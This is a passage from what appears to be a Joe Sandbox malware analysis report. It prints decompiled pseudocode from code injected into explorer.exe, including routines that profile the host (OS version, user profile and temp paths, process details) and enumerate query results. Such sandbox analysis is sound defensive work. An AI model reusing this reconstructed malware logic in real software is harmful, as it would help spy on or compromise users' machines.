        						E000C86E1(_t27,  *_t63, 0x400);
        						_v8 = 0;
        						_t36 = E000C109A(_t63, 0x34a);
        						_t66 =  *0xde688; // 0xf0000
        						_t72 =  !=  ? 0x67d : 0x615;
        						_t38 = E000C95E1(_t66,  !=  ? 0x67d : 0x615);
        						_push(0);
        						_push(_t36);
        						_t67 = "\\";
        						_v24 = _t38;
        						_push(_t67);
        						_push(_t38);
        						_t39 =  *0xde688; // 0xf0000
        						_push(_t67);
        						_v20 = E000C92E5(_t39 + 0x1020);
        						_t42 = E000CA6A9( &_v8, _t41,  &_v8); // executed
        						_v16 = _t42;
        						E000C85D5( &_v24);
        						E000C85D5( &_v20);
        						_t73 = _v16;
        						_t82 = _t81 + 0x3c;
        						_t69 = _v8;
        						if(_v16 != 0 && _t69 > 0x400) {
        							_t51 =  *0xde654; // 0x280fd30
        							_t52 =  *((intOrPtr*)(_t51 + 4));
        							_t53 =  <  ? _t69 : _t52;
        							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
        							E000C86E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
        							_t69 = _v8;
        							_t82 = _t82 + 0xc;
        						}
        						E000C861A( &_v16, _t69);
        						E000C861A( &_v20, 0xfffffffe);
        						_t27 = _v12;
        						_t81 = _t82 + 0x10;
        						_t63 =  *0xde654; // 0x280fd30
        					}
        					_t78 = 0;
        					while(1) {
        						_t29 =  *0xde688; // 0xf0000
        						_t31 = E000CA77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
        						_t81 = _t81 + 0xc;
        						if(_t31 >= 0) {
        							break;
        						}
        						Sleep(1);
        						_t78 = _t78 + 1;
        						if(_t78 < 0x2710) {
        							_t27 = _v12;
        							_t63 =  *0xde654; // 0x280fd30
        							continue;
        						}
        						break;
        					}
        					E000C861A( &_v12, 0); // executed
        				}
        				return 0;
        			}


























        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,000CF8B5,?,?,?,000CFCB9,00000000), ref: 000CFAEC
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeapSleep
        • String ID:
        • API String ID: 4201116106-0
        • Opcode ID: ff03731fb7cec7f2ce6ab9bc1402b2993290a223dea6d4185847bfae306a6c5f
        • Instruction ID: 0cbca30703809a2c9c0d4c860327d646f2255841ca950a665f446f2c8c25f923
        • Opcode Fuzzy Hash: ff03731fb7cec7f2ce6ab9bc1402b2993290a223dea6d4185847bfae306a6c5f
        • Instruction Fuzzy Hash: F0417FB2A00105ABEB04EBA4CD85FAEB7BDEB54304B14407EF905DB242DB39DA05CB65
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E000C5D7D(void* __eflags) {
        				char _v44;
        				intOrPtr _t7;
        				intOrPtr _t10;
        				void* _t11;
        				WCHAR* _t12;
        				WCHAR* _t13;
        				WCHAR* _t14;
        				intOrPtr _t15;
        				intOrPtr _t19;
        				intOrPtr _t22;
        				void* _t27;
        				WCHAR* _t28;
        
        				_t7 =  *0xde688; // 0xf0000
        				E000CA86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
        				_t10 =  *0xde684; // 0x280f8f0
        				_t28 = 2;
        				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
        				if(_t11 == 0) {
        					_t22 =  *0xde688; // 0xf0000
        					_t12 = E000C5974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
        					 *0xde6ac = _t12;
        					__eflags = _t12;
        					if(_t12 != 0) {
        						_t14 = E000C9EBB();
        						__eflags = _t14;
        						if(_t14 == 0) {
        							_t28 = 0;
        							__eflags = 0;
        						} else {
        							_t15 =  *0xde688; // 0xf0000
        							lstrcmpiW(_t15 + 0x228, _t14);
        							asm("sbb esi, esi");
        							_t28 = _t28 + 1;
        						}
        					}
        					_t13 = _t28;
        				} else {
        					_t19 =  *0xde684; // 0x280f8f0
        					 *((intOrPtr*)(_t19 + 0x30))(_t11);
        					_t13 = 3;
        				}
        				return _t13;
        			}
















        APIs
        • lstrcmpiW.KERNEL32(000EFDD8,00000000), ref: 000C5DF2
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: lstrcmpi
        • String ID:
        • API String ID: 1586166983-0
        • Opcode ID: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
        • Instruction ID: 103ad920e2b6f5a977f8ee732e07f157b635f09cc7f745bb5b42d842e6e571db
        • Opcode Fuzzy Hash: b5c5492bde0fcbd79c8d76813e54915602f39492791b3c08382e59e2492a186d
        • Instruction Fuzzy Hash: 7201B1312026119FF754EBA9DC89F9E33E8DB58341F054029F902DF1E2DA60E840C7B1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000CBA05() {
        				signed int _v8;
        				signed int _v12;
        				intOrPtr _t15;
        				void* _t16;
        				void* _t18;
        				void* _t21;
        				intOrPtr _t22;
        				void* _t24;
        				void* _t30;
        
        				_v8 = _v8 & 0x00000000;
        				_t15 =  *0xde68c; // 0x280fab8
        				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
        				if(_t16 != 0) {
        					_v12 = _v12 & 0x00000000;
        					_t18 = E000CB998(1,  &_v12); // executed
        					_t30 = _t18;
        					if(_t30 != 0) {
        						CloseHandle(_v8);
        						_t21 = _t30;
        					} else {
        						if(_v8 != _t18) {
        							_t22 =  *0xde684; // 0x280f8f0
        							 *((intOrPtr*)(_t22 + 0x30))(_v8);
        						}
        						_t21 = 0;
        					}
        					return _t21;
        				} else {
        					return _t16;
        				}
        			}













        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
        • Instruction ID: 1444dde37cf9ff6e32baa45f932119c6418e42d8efec47e869b3358f31e80b18
        • Opcode Fuzzy Hash: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
        • Instruction Fuzzy Hash: A2F06931A10208EFDF60EBA0C986FAE77F8EB04399F1140A9B441EB151DB74DE009B61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000C861A(int _a4, intOrPtr _a8) {
        				int _t3;
        				intOrPtr _t4;
        				void* _t9;
        
        				_t3 = _a4;
        				if(_t3 == 0) {
        					return _t3;
        				}
        				_t9 =  *_t3;
        				if(_t9 != 0) {
        					 *_t3 =  *_t3 & 0x00000000;
        					_t4 = _a8;
        					if(_t4 != 0xffffffff) {
        						if(_t4 == 0xfffffffe) {
        							_t4 = E000CC392(_t9);
        						}
        					} else {
        						_t4 = E000CC379(_t9);
        					}
        					E000C874F(_t9, 0, _t4);
        					_t3 = HeapFree( *0xde768, 0, _t9); // executed
        				}
        				return _t3;
        			}







        APIs
        • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
        • Instruction ID: bdf107fd91a53e23c3bc046cb1b94fcf4e343da30d7e73e1e878ef7509521b23
        • Opcode Fuzzy Hash: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
        • Instruction Fuzzy Hash: 94F0A031502624AFEA616B24EC01FAE37889F02B30F24C209F818AA1E1DF309D0087ED
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000CA77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
        				signed int _t5;
        				void* _t6;
        				void* _t10;
        				long _t15;
        				void* _t17;
        
        				_t15 = 2;
        				_t5 = E000CA5F7(_a4, _t15);
        				_t17 = _t5;
        				if(_t17 != 0) {
        					_t6 = E000CA65C(_t17, _a8, _a12); // executed
        					if(_t6 != 0) {
        						CloseHandle(_t17);
        						return 0;
        					}
        					_t10 = 0xfffffffe;
        					return _t10;
        				}
        				return _t5 | 0xffffffff;
        			}









        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
        • Instruction ID: 530dcad075266c1156e77377669d94ddcef453a396c3f42a45d0ff379d1e2d4c
        • Opcode Fuzzy Hash: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
        • Instruction Fuzzy Hash: 55E09B3530861D6B8B2157A8AC50E9E3765AF4A77C7114716FD258F2D1CA30D84042D2
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E000CB337(void* __ecx) {
        				intOrPtr _t4;
        				void* _t5;
        				intOrPtr _t6;
        				void* _t12;
        				void* _t13;
        
        				_t4 =  *0xde684; // 0x280f8f0
        				_t13 = 0;
        				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
        				_t12 = _t5;
        				if(_t12 != 0) {
        					_t6 =  *0xde684; // 0x280f8f0
        					_push(_t12);
        					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
        						_t13 = 1;
        					}
        					CloseHandle(_t12);
        					return _t13;
        				}
        				return _t5;
        			}









        APIs
        • CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
        • Instruction ID: 952f55d8802c1bf5a37f67cca09105c85e7c47fe1d2e413aeb41e2f7cc7b4704
        • Opcode Fuzzy Hash: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
        • Instruction Fuzzy Hash: B2E04F32301160ABD6606B69EC8CF6B7BA9FB99A91F06016DF905CB151CB24C802C7B1
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        C-Code - Quality: 86%
        			E000CD01F(void* __fp0) {
        				char _v8;
        				char _v12;
        				char _v16;
        				struct _SYSTEM_INFO _v52;
        				char _v180;
        				char _v692;
        				char _v704;
        				char _v2680;
        				void* __esi;
        				struct _OSVERSIONINFOA* _t81;
        				intOrPtr _t83;
        				void* _t84;
        				long _t86;
        				intOrPtr* _t88;
        				intOrPtr _t90;
        				intOrPtr _t95;
        				intOrPtr _t97;
        				void* _t98;
        				intOrPtr _t103;
        				char* _t105;
        				void* _t108;
        				char _t115;
        				signed int _t117;
        				char _t119;
        				intOrPtr _t124;
        				intOrPtr _t127;
        				intOrPtr _t130;
        				intOrPtr _t134;
        				intOrPtr _t147;
        				intOrPtr _t149;
        				intOrPtr _t152;
        				intOrPtr _t154;
        				signed int _t159;
        				struct HINSTANCE__* _t162;
        				short* _t164;
        				intOrPtr _t167;
        				WCHAR* _t168;
        				char* _t169;
        				intOrPtr _t181;
        				intOrPtr _t200;
        				void* _t215;
        				char _t218;
        				void* _t219;
        				char* _t220;
        				struct _OSVERSIONINFOA* _t222;
        				void* _t223;
        				int* _t224;
        				void* _t241;
        
        				_t241 = __fp0;
        				_t162 =  *0xde69c; // 0x10000000
        				_t81 = E000C8604(0x1ac4);
        				_t222 = _t81;
        				if(_t222 == 0) {
        					return _t81;
        				}
        				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
        				_t83 =  *0xde684; // 0x280f8f0
        				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
        				_t3 = _t222 + 0x648; // 0x648
        				E000D2301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
        				_t5 = _t222 + 0x1644; // 0x1644
        				_t216 = _t5;
        				_t86 = GetModuleFileNameW(0, _t5, 0x105);
        				_t227 = _t86;
        				if(_t86 != 0) {
        					 *((intOrPtr*)(_t222 + 0x1854)) = E000C8FBE(_t216, _t227);
        				}
        				GetCurrentProcess();
        				_t88 = E000CBA05();
        				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
        				_t178 =  *_t88;
        				if(E000CBB8D( *_t88) == 0) {
        					_t90 = E000CBA62(_t178, _t222);
        					__eflags = _t90;
        					_t181 = (0 | _t90 > 0x00000000) + 1;
        					__eflags = _t181;
        					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
        				} else {
        					 *((intOrPtr*)(_t222 + 0x214)) = 3;
        				}
        				_t12 = _t222 + 0x220; // 0x220
        				 *((intOrPtr*)(_t222 + 0x218)) = E000CE3F1(_t12);
        				 *((intOrPtr*)(_t222 + 0x21c)) = E000CE3B6(_t12);
        				_push( &_v16);
        				 *(_t222 + 0x224) = _t162;
        				_push( &_v8);
        				_v12 = 0x80;
        				_push( &_v692);
        				_v8 = 0x100;
        				_push( &_v12);
        				_t22 = _t222 + 0x114; // 0x114
        				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
        				_t95 =  *0xde68c; // 0x280fab8
        				_push(0);
        				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
        					GetLastError();
        				}
        				_t97 =  *0xde694; // 0x280fa48
        				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
        				_t26 = _t222 + 0x228; // 0x228
        				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
        				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
        				GetLastError();
        				_t31 = _t222 + 0x228; // 0x228
        				 *((intOrPtr*)(_t222 + 0x434)) = E000C8FBE(_t31, _t98);
        				_t34 = _t222 + 0x114; // 0x114
        				_t103 = E000CB7A8(_t34,  &_v692);
        				_t35 = _t222 + 0xb0; // 0xb0
        				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
        				_push(_t35);
        				E000CB67D(_t103, _t35, _t98, _t241);
        				_t37 = _t222 + 0xb0; // 0xb0
        				_t105 = _t37;
        				_t38 = _t222 + 0xd0; // 0xd0
        				_t164 = _t38;
        				if(_t105 != 0) {
        					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
        					if(_t159 > 0) {
        						_t164[_t159] = 0;
        					}
        				}
        				_t41 = _t222 + 0x438; // 0x438
        				_t42 = _t222 + 0x228; // 0x228
        				E000C8FD8(_t42, _t41);
        				_t43 = _t222 + 0xb0; // 0xb0
        				_t108 = E000CD400(_t43, E000CC379(_t43), 0);
        				_t44 = _t222 + 0x100c; // 0x100c
        				E000CB88A(_t108, _t44, _t241);
        				_t199 = GetCurrentProcess();
        				 *((intOrPtr*)(_t222 + 0x101c)) = E000CBBDF(_t110);
        				memset(_t222, 0, 0x9c);
        				_t224 = _t223 + 0xc;
        				_t222->dwOSVersionInfoSize = 0x9c;
        				GetVersionExA(_t222);
        				_t167 =  *0xde684; // 0x280f8f0
        				_t115 = 0;
        				_v8 = 0;
        				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
        					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
        					_t115 = _v8;
        				}
        				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
        				if(_t115 == 0) {
        					GetSystemInfo( &_v52);
        					_t117 = _v52.dwOemId & 0x0000ffff;
        				} else {
        					_t117 = 9;
        				}
        				_t54 = _t222 + 0x1020; // 0x1020
        				_t168 = _t54;
        				 *(_t222 + 0x9c) = _t117;
        				GetWindowsDirectoryW(_t168, 0x104);
        				_t119 = E000C95E1(_t199, 0x10c);
        				_t200 =  *0xde684; // 0x280f8f0
        				_t218 = _t119;
        				 *_t224 = 0x104;
        				_push( &_v704);
        				_push(_t218);
        				_v8 = _t218;
        				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
        					_t154 =  *0xde684; // 0x280f8f0
        					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
        				}
        				E000C85D5( &_v8);
        				_t124 =  *0xde684; // 0x280f8f0
        				_t61 = _t222 + 0x1434; // 0x1434
        				_t219 = _t61;
        				 *_t224 = 0x209;
        				_push(_t219);
        				_push(L"USERPROFILE");
        				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
        					E000C9640(_t219, 0x105, L"%s\\%s", _t168);
        					_t152 =  *0xde684; // 0x280f8f0
        					_t224 =  &(_t224[5]);
        					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
        				}
        				_push(0x20a);
        				_t64 = _t222 + 0x122a; // 0x122a
        				_t169 = L"TEMP";
        				_t127 =  *0xde684; // 0x280f8f0
        				_push(_t169);
        				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
        					_t149 =  *0xde684; // 0x280f8f0
        					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
        				}
        				_push(0x40);
        				_t220 = L"SystemDrive";
        				_push( &_v180);
        				_t130 =  *0xde684; // 0x280f8f0
        				_push(_t220);
        				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
        					_t147 =  *0xde684; // 0x280f8f0
        					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
        				}
        				_v8 = 0x7f;
        				_t72 = _t222 + 0x199c; // 0x199c
        				_t134 =  *0xde684; // 0x280f8f0
        				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
        				_t75 = _t222 + 0x100c; // 0x100c
        				E000D2301(E000CD400(_t75, E000CC379(_t75), 0),  &_v2680);
        				_t76 = _t222 + 0x1858; // 0x1858
        				E000D22D3( &_v2680, _t76, 0x20);
        				_t79 = _t222 + 0x1878; // 0x1878
        				E000C902D(1, _t79, 0x14, 0x1e,  &_v2680);
        				 *((intOrPtr*)(_t222 + 0x1898)) = E000CCD33(_t79);
        				return _t222;
        			}




















































        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • GetCurrentProcessId.KERNEL32 ref: 000CD046
        • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 000CD082
        • GetCurrentProcess.KERNEL32 ref: 000CD09F
        • GetLastError.KERNEL32 ref: 000CD13E
        • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 000CD16C
        • GetLastError.KERNEL32 ref: 000CD172
        • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 000CD1C7
        • GetCurrentProcess.KERNEL32 ref: 000CD20E
        • memset.MSVCRT ref: 000CD229
        • GetVersionExA.KERNEL32(00000000), ref: 000CD234
        • GetCurrentProcess.KERNEL32(00000100), ref: 000CD24E
        • GetSystemInfo.KERNEL32(?), ref: 000CD26A
        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 000CD287
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
        • API String ID: 3876402152-2706916422
        • Opcode ID: 4af17ca78047f5755655550a5f9ec8d45349bfa14e1532cc1a67cc79d32b533b
        • Instruction ID: bb5fc8c38e6f26cdcc8b067c3c65418d8cefabbea5c8d39083ed8debe4d40b99
        • Opcode Fuzzy Hash: 4af17ca78047f5755655550a5f9ec8d45349bfa14e1532cc1a67cc79d32b533b
        • Instruction Fuzzy Hash: A1B14C71600744ABE710EB74DD89FEE77E8EF58340F00446EF95AD7292EB74AA448B21
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 50%
        			E000CDB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				char _v24;
        				void* _v28;
        				signed int _v32;
        				char _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				char _v48;
        				char _v52;
        				intOrPtr _v56;
        				signed int _v60;
        				char* _v72;
        				signed short _v80;
        				signed int _v84;
        				char _v88;
        				char _v92;
        				char _v96;
        				intOrPtr _v100;
        				char _v104;
        				char _v616;
        				intOrPtr* _t159;
        				char _t165;
        				signed int _t166;
        				signed int _t173;
        				signed int _t178;
        				signed int _t186;
        				intOrPtr* _t187;
        				signed int _t188;
        				signed int _t192;
        				intOrPtr* _t193;
        				intOrPtr _t200;
        				intOrPtr* _t205;
        				signed int _t207;
        				signed int _t209;
        				intOrPtr* _t210;
        				intOrPtr _t212;
        				intOrPtr* _t213;
        				signed int _t214;
        				char _t217;
        				signed int _t218;
        				signed int _t219;
        				signed int _t230;
        				signed int _t235;
        				signed int _t242;
        				signed int _t243;
        				signed int _t244;
        				signed int _t245;
        				intOrPtr* _t247;
        				intOrPtr* _t251;
        				signed int _t252;
        				intOrPtr* _t253;
        				void* _t255;
        				intOrPtr* _t261;
        				signed int _t262;
        				signed int _t283;
        				signed int _t289;
        				char* _t298;
        				void* _t320;
        				signed int _t322;
        				intOrPtr* _t323;
        				intOrPtr _t324;
        				signed int _t327;
        				intOrPtr* _t328;
        				intOrPtr* _t329;
        
        				_v32 = _v32 & 0x00000000;
        				_v60 = _v60 & 0x00000000;
        				_v56 = __edx;
        				_v100 = __ecx;
        				_t159 = E000CD523(__ecx);
        				_t251 = _t159;
        				_v104 = _t251;
        				if(_t251 == 0) {
        					return _t159;
        				}
        				_t320 = E000C8604(0x10);
        				_v36 = _t320;
        				_pop(_t255);
        				if(_t320 == 0) {
        					L53:
        					E000C861A( &_v60, 0xfffffffe);
        					E000CD5D7( &_v104);
        					return _t320;
        				}
        				_t165 = E000C95E1(_t255, 0x536);
        				 *_t328 = 0x609;
        				_v52 = _t165;
        				_t166 = E000C95E1(_t255);
        				_push(0);
        				_push(_v56);
        				_v20 = _t166;
        				_push(_t166);
        				_push(_a4);
        				_t322 = E000C92E5(_t165);
        				_v60 = _t322;
        				E000C85D5( &_v52);
        				E000C85D5( &_v20);
        				_t329 = _t328 + 0x20;
        				if(_t322 != 0) {
        					_t323 = __imp__#2;
        					_v40 =  *_t323(_t322);
        					_t173 = E000C95E1(_t255, 0x9e4);
        					_v20 = _t173;
        					_v52 =  *_t323(_t173);
        					E000C85D5( &_v20);
        					_t324 = _v40;
        					_t261 =  *_t251;
        					_t252 = 0;
        					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
        					__eflags = _t178;
        					if(_t178 != 0) {
        						L52:
        						__imp__#6(_t324);
        						__imp__#6(_v52);
        						goto L53;
        					}
        					_t262 = _v32;
        					_v28 = 0;
        					_v20 = 0;
        					__eflags = _t262;
        					if(_t262 == 0) {
        						L49:
        						 *((intOrPtr*)( *_t262 + 8))(_t262);
        						__eflags = _t252;
        						if(_t252 == 0) {
        							E000C861A( &_v36, 0);
        							_t320 = _v36;
        						} else {
        							 *(_t320 + 8) = _t252;
        							 *_t320 = E000C91E3(_v100);
        							 *((intOrPtr*)(_t320 + 4)) = E000C91E3(_v56);
        						}
        						goto L52;
        					} else {
        						goto L6;
        					}
        					while(1) {
        						L6:
        						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
        						__eflags = _t186;
        						if(_t186 != 0) {
        							break;
        						}
        						_v16 = 0;
        						_v48 = 0;
        						_v12 = 0;
        						_v24 = 0;
        						__eflags = _v84;
        						if(_v84 == 0) {
        							break;
        						}
        						_t187 = _v28;
        						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
        						__eflags = _t188;
        						if(_t188 >= 0) {
        							__imp__#20(_v24, 1,  &_v16);
        							__imp__#19(_v24, 1,  &_v48);
        							_t46 = _t320 + 0xc; // 0xc
        							_t253 = _t46;
        							_t327 = _t252 << 3;
        							_t47 = _t327 + 8; // 0x8
        							_t192 = E000C8698(_t327, _t47);
        							__eflags = _t192;
        							if(_t192 == 0) {
        								__imp__#16(_v24);
        								_t193 = _v28;
        								 *((intOrPtr*)( *_t193 + 8))(_t193);
        								L46:
        								_t252 = _v20;
        								break;
        							}
        							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
        							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E000C8604( *(_t327 +  *_t253) << 3);
        							_t200 =  *_t253;
        							__eflags =  *(_t327 + _t200 + 4);
        							if( *(_t327 + _t200 + 4) == 0) {
        								_t136 = _t320 + 0xc; // 0xc
        								E000C861A(_t136, 0);
        								E000C861A( &_v36, 0);
        								__imp__#16(_v24);
        								_t205 = _v28;
        								 *((intOrPtr*)( *_t205 + 8))(_t205);
        								_t320 = _v36;
        								goto L46;
        							}
        							_t207 = _v16;
        							while(1) {
        								_v12 = _t207;
        								__eflags = _t207 - _v48;
        								if(_t207 > _v48) {
        									break;
        								}
        								_v44 = _v44 & 0x00000000;
        								_t209 =  &_v12;
        								__imp__#25(_v24, _t209,  &_v44);
        								__eflags = _t209;
        								if(_t209 < 0) {
        									break;
        								}
        								_t212 = E000C91E3(_v44);
        								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
        								_t213 = _v28;
        								_t281 =  *_t213;
        								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
        								__eflags = _t214;
        								if(_t214 < 0) {
        									L39:
        									__imp__#6(_v44);
        									_t207 = _v12 + 1;
        									__eflags = _t207;
        									continue;
        								}
        								_v92 = E000C95E1(_t281, 0x250);
        								 *_t329 = 0x4cc;
        								_t217 = E000C95E1(_t281);
        								_t283 = _v80;
        								_v96 = _t217;
        								_t218 = _t283 & 0x0000ffff;
        								__eflags = _t218 - 0xb;
        								if(__eflags > 0) {
        									_t219 = _t218 - 0x10;
        									__eflags = _t219;
        									if(_t219 == 0) {
        										L35:
        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
        										__eflags = _t289;
        										if(_t289 == 0) {
        											L38:
        											E000C85D5( &_v92);
        											E000C85D5( &_v96);
        											__imp__#9( &_v80);
        											goto L39;
        										}
        										_push(_v72);
        										_push(L"%d");
        										L37:
        										_push(0xc);
        										_push(_t289);
        										E000C9640();
        										_t329 = _t329 + 0x10;
        										goto L38;
        									}
        									_t230 = _t219 - 1;
        									__eflags = _t230;
        									if(_t230 == 0) {
        										L33:
        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
        										__eflags = _t289;
        										if(_t289 == 0) {
        											goto L38;
        										}
        										_push(_v72);
        										_push(L"%u");
        										goto L37;
        									}
        									_t235 = _t230 - 1;
        									__eflags = _t235;
        									if(_t235 == 0) {
        										goto L33;
        									}
        									__eflags = _t235 == 1;
        									if(_t235 == 1) {
        										goto L33;
        									}
        									L28:
        									__eflags = _t283 & 0x00002000;
        									if((_t283 & 0x00002000) == 0) {
        										_v88 = E000C95E1(_t283, 0x219);
        										E000C9640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
        										E000C85D5( &_v88);
        										_t329 = _t329 + 0x18;
        										_t298 =  &_v616;
        										L31:
        										_t242 = E000C91E3(_t298);
        										L32:
        										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
        										goto L38;
        									}
        									_t242 = E000CDA20( &_v80);
        									goto L32;
        								}
        								if(__eflags == 0) {
        									__eflags = _v72 - 0xffff;
        									_t298 = L"TRUE";
        									if(_v72 != 0xffff) {
        										_t298 = L"FALSE";
        									}
        									goto L31;
        								}
        								_t243 = _t218 - 1;
        								__eflags = _t243;
        								if(_t243 == 0) {
        									goto L38;
        								}
